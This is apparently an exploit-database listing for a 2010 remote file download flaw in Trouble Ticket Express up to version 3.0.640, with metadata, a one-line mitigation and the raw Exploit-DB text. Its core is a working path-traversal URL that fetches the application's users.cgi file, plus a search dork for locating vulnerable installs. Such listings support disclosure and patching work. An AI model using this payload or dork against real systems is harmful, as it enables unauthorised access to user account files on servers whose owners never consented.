header-logo
Suggest Exploit
vendor:
Trouble Ticket Express
by:
n01d
9,3
CVSS
HIGH
Remote File Download
N/A
CWE
Product Name: Trouble Ticket Express
Affected Version From: <=3.0.640
Affected Version To: <=3.0.640
Patch Exists: YES
Related CWE: N/A
CPE: a:united_web_coders:trouble_ticket_express
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2010

Trouble Ticket Software 0Day

http://www.example.com/TTXdir/ ttx.cgi?cmd=file&fid=../users.cgi&fn=users.cgi

Mitigation:

Upgrade to the latest version of Trouble Ticket Software
Source

Exploit-DB raw data:

# Exploit Title: Trouble Ticket Software 0Day
# Date: 3/12/2010
# Author: n01d
# Software Link: http://www.troubleticketexpress.com
# Version: TTX v3.0.640
# Tested on: <=3.0.640
                 ___   _      _
         _ __   / _ \ / |  __| |
        | '_ \ | | | || | / _` |
        | | | || |_| || || (_| |
        |_| |_| \___/ |_| \__,_|
        Bob  @  http://n01d.com


Type:    Trouble Ticket Software 0Day

Vendor:  Remote File Download

Exploit: http://www.example.com/TTXdir/ ttx.cgi?cmd=file&fid=../users.cgi&fn=users.cgi

Dork:    "Help desk software by United Web Coders rev. 3.0.640"

Shouts:  Pro, resU, Bob, Jester, Crusader, Wozniak